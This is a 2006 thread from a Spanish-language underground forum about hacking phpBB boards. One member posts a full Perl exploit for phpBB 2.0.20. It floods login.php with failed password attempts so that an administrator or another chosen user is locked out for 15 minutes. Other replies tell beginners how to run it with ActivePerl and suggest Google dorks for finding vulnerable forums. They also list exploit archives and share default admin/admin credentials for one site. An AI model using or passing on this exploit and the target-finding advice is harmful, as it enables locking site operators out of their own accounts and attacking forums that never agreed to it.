Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 02:27:35
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: hackear phpBB 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: hackear phpBB  (Leído 5546 veces)
320
Recien Llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil Email
« en: Abril 28, 2006, 04:43:45 »

En línea
.:Avantasia:.
Recien Llegado
*
Desconectado Desconectado

Mensajes: 14


In The DarkNess..


Ver Perfil
« Respuesta #1 en: Abril 29, 2006, 05:23:58 »

« Última modificación: Abril 29, 2006, 05:26:06 por .:Avantasia:. » En línea

liquik
Colaborador
*****
Desconectado Desconectado

Mensajes: 408


Ver Perfil
« Respuesta #2 en: Mayo 01, 2006, 03:50:55 »

En línea

liquik
Sekurity0
Visitante
« Respuesta #3 en: Julio 02, 2006, 07:58:11 »

320 busca en www.SecurityFocus.com algun xploit para phpBB, mira la version del que quieres hackear y en el buscador de SF pon phpBB X.XX.X (X.XX.X = Version) y prueba con los que te salen.

Saludos!  Cheesy
En línea
_0R6uL10_
Recien Llegado
*
Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
« Respuesta #4 en: Agosto 04, 2006, 07:01:40 »

mira un amigo me paso este exploits

Código:
###################################################################################
#!/usr/bin/perl
# For PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
# Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}

Estoy buscando como copilarlo pero no se como se hase soy nuevo en esto
En línea

AMIGO ENTREN EN MI WEB FAVOR DE VOTAR
http://www.sv-group.sv.tc/
se los boy agradecer mucho
http://www.sv-group.sv.tc/
VanNovax
Visitante
« Respuesta #5 en: Agosto 04, 2006, 07:58:13 »

Ese exploit es para la version # For PHPBB 2.0.20

Google: Powered by phpBB 2.0.20

Recomendacion


Google: palabra + Powered by phpBB 2.0.20


Tambien:

-----------------------------

Amigo, te descargas el Active Perl ;-) Buscate un manual de Como utilizar aunque es muy sencillo  Wink  O creo que ahy una manual de Active Perl, en la seccion de Programacion.  Smiley

Y ejecutas el "Codigo".


-------------------------------Tips:

#!/usr/bin/perl (Perl) Lenguaje de Programacion.

#!/usr/bin/php (Php) Lenguaje de Programacion Web.

#include <stdio.h> (Lenguaje C# o C++)

#!/usr/bin/pyhton (py) (Python Programm)

sub_command (Visual Basic, pero en intrucciones no lo vas a ver en Source) xD.


saludos ;-). +


Esas Variables, si la vez en un Codigo de Exploit. Sabras que hacer ;-)

-----------------------------Repasemos:

Si es Perl (Usamos un Internprete o Compilador "ActivePerl")

Si es Lenguaje C (usamos el cgwin si lo queremos ejecutar en guindos o lo ejecumaos en linux, pero es un tema mas extenso) o usamos el Dev C++

Si es php "HAHAHA SUBELO A UN HOST Y YA ESTA"

Si es pyhton (Busca el interprete de python)


En línea
_0R6uL10_
Recien Llegado
*
Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
« Respuesta #6 en: Agosto 04, 2006, 08:02:58 »

En línea

AMIGO ENTREN EN MI WEB FAVOR DE VOTAR
http://www.sv-group.sv.tc/
se los boy agradecer mucho
http://www.sv-group.sv.tc/
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #7 en: Agosto 13, 2006, 01:55:29 »

([HanowarS])Si es php "HAHAHA SUBELO A UN HOST Y YA ESTA"

si tengo el exploit en php, lo guardo en php
luego tengo un hosting que sorporte esta extencion
y luego q?
como ago para ejecutar este exploit
como lanzo el exploit de mi php a la pagina objetivo.?
me encantaria que me aclarian ese punto
muchas gracias


En línea

Acme_rancid
Miembro
*****
Desconectado Desconectado

Mensajes: 22


elgigante_56@hotmail.com nejc28
Ver Perfil WWW Email
« Respuesta #8 en: Agosto 19, 2006, 09:45:06 »

Para compilar el exploit si esta echo en c buscate algun compilador como el dev++
= mente muchos exploits publicados en la red no funcionan, tenes que modificarles alguna cosas.
En línea

OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #9 en: Agosto 20, 2006, 12:18:54 »

hola
aqui ahy un manual para compilar en C
http://foro.el-hacker.com/index.php/topic,63749.0.html
y en perl
http://foro.el-hacker.com/index.php/topic,63960.0.html

y aqui algunos lados en donde encontraras los exploit

Milworm
http://www.milw0rm.com/search.php

Security Nnov
http://www.security.nnov.ru/exploits/?tienes

packetstormsecurity
http://www.packetstormsecurity.org/

frsirt
http://www.frsirt.com/

Descuidos el portal:(usuario:admin password: admin )
http://descuidos.elportal.info/

En línea

caxorro
Visitante
« Respuesta #10 en: Agosto 30, 2006, 01:22:21 »

hola buenas tengo un par de dudas sobre esto

aver si podriais ayudarme....

mi msn es  :  NOMAIL @NOMSN.com

porfavor, quiero aprender un par de cosas

gracias.

 NOTA DEL MODERADOR: No puedes publicar correos en el foro.
« Última modificación: Diciembre 24, 2006, 02:37:58 por Pr0gr4mer » En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #11 en: Agosto 30, 2006, 01:39:59 »

nunca pongas tu mail al publico, siempre te molestaran mandandote tonteras, como spam etc...
o te pueden congelar la cuenta y listo....
nunca agas eso, un sano consejo..
En línea

_0R6uL10_
Recien Llegado
*
Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
« Respuesta #12 en: ſeptiembre 14, 2006, 02:02:03 »

lo ejecuto y me sale esto

   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------

que tengo que haser aqui.......
En línea

AMIGO ENTREN EN MI WEB FAVOR DE VOTAR
http://www.sv-group.sv.tc/
se los boy agradecer mucho
http://www.sv-group.sv.tc/
ManuloSK
Recien Llegado
*
Desconectado Desconectado

Mensajes: 15


Ver Perfil
« Respuesta #13 en: ſeptiembre 19, 2006, 04:17:52 »

([HanowarS])Si es php "HAHAHA SUBELO A UN HOST Y YA ESTA"

si tengo el exploit en php, lo guardo en php
luego tengo un hosting que sorporte esta extencion
y luego q?
como ago para ejecutar este exploit
como lanzo el exploit de mi php a la pagina objetivo.?
me encantaria que me aclarian ese punto
muchas gracias


Lo mismo me encantaria saber
Saludos

En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #14 en: ſeptiembre 19, 2006, 04:23:43 »

http://xtremehacking.smfhost.com/index.php?topic=464.0
jwajawj.. Cheesy  hanowars nadie dice que no sabes pero esas respuestas que das da razon para hacer lo que isieron Cheesy
jawjawjawaw
En línea

Shobi-Flip
Habitual
*****
Desconectado Desconectado

Mensajes: 197



Ver Perfil
« Respuesta #15 en: ſeptiembre 22, 2006, 01:29:11 »

debes ponerlo en un block de notas   y cuambiarle el formato (yo uso perl)   el programa se llama Active perl....   luego para activarlo  lo colocas donde tu kieras   en mi caso lo pongo en c: es mas facil     vas a cmd o command prompt  y lo abres desde ahi  Smiley   y aces loq ue el explit te diga Grin
En línea

Get RapidShare Free Account ... Just Click Here !


No MaS MeNSajeS coMo eSoS....Y MeNoS Si eReS RecieN lleGado
anonimox
Habitual
*****
Desconectado Desconectado

Mensajes: 277



Ver Perfil Email
« Respuesta #16 en: ſeptiembre 23, 2006, 06:53:04 »

muchas respuestas y ninguna gracia.... ademas fue su primer y utlimo post  Grin Grin Grin

y hay un monton de manuales por este foro.... 
o mejor
http://www.milw0rm.com/remotephp.php?it=phpBB

con ese link podrias encontrar casi todos los exploit para phpbb


salu2

En línea

http://www.ahost.co.nr  - Servidor para subir cosas sobre hacking

                                          ? \!/ ?
                                           (o o)
------------------------------OOo-(_)-oOOo------------------------
Cp:Sheppard
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil Email
« Respuesta #17 en: Noviembre 19, 2006, 04:35:07 »

En línea
Chivaman
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5


Ver Perfil Email
« Respuesta #18 en: Diciembre 16, 2006, 01:19:13 »

« Última modificación: Diciembre 17, 2006, 11:51:33 por Chivaman » En línea
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« Respuesta #19 en: Diciembre 24, 2006, 11:19:18 »

seguro ke era la version Huh??
En línea






No respondo mensajes privados ni atiendo en el messenger..
r.u.b.i.o
Habitual
*****
Desconectado Desconectado

Mensajes: 344


Rahma Naoarak O'al

seba.lpda@gmail.com
Ver Perfil Email
« Respuesta #20 en: Diciembre 27, 2006, 06:37:11 »

pregunto : para q queres desabilitar un user por 15 minutos ?

busca un exploit mas funcional !  Evil





salu2 Smiley
En línea
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« Respuesta #21 en: Diciembre 28, 2006, 07:49:11 »

calro.. cuando esos foros estan llenos de sql injections xD
En línea






No respondo mensajes privados ni atiendo en el messenger..
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: hackear phpBB « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC